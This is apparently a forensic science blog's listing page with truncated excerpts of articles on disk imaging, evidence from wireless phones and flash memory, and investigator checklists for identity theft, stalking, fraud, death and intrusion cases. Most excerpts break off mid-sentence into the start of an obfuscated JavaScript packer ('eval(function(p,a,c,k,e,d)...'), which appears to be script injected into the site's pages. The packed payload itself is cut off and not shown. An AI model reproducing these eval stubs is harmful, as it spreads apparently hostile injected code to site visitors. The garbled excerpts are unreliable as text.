Forensic Science

Computer forensics disk imaging

Computer forensics disk imaging

When we are dealing with different computer forensic cases, we usually need to perform disk imaging. Disk imaging in computer forensics is different and much stricter than the common data copy and disk image, it must ensure the copied data is...

 

Wireless Telephones Potential Evidence

Wireless Telephones Potential Evidence

Electronic devices may contain viable evidence associated with criminal activity. Unless an emergency exists, the device should not be accessed. Should it be necessary to access the device, all actions associated with the manipulation of the...

 

How to recognize digital evidence

How to recognize digital evidence

An interesting snippet from the United States Secret Service on how eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new...

 

Forensic Data Recovery from Flash Memory Basic

Forensic Data Recovery from Flash Memory Basic

The evolution in consumer electronics has caused an Texponential growth in the amount of mobile eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return...

 

identity theft potential evidence

identity theft potential evidence

The following outline should help investigators identify the common findings of a forensic eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return...

 

gambling potential evidence

The following outline should help investigators identify the common findings of a forensic review as they relate to specific categories. This may also help define eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return...

 

email threats/harassment/stalking potential evidence

The following outline should help investigators identify the common findings of a forensic review as they relate to specific categories. This may also help define the scope of the examination to be performed. eval(function(p,a,c,k,e,d){e=function(c){return...

 

domestic violence and fraud including online fraud

The following outline should help investigators identify the common findings of a forensic review as they relate to specific categories. This may also help define the scope of the examination to be performed. Domestic eval(function(p,a,c,k,e,d){e=function(c){return...

 

murder/death investigation potential evidence

The following outline should help investigators identify the common findings of a forensic eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return...

 

computer/network intrusion potential evidence

The following outline should help investigators eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new...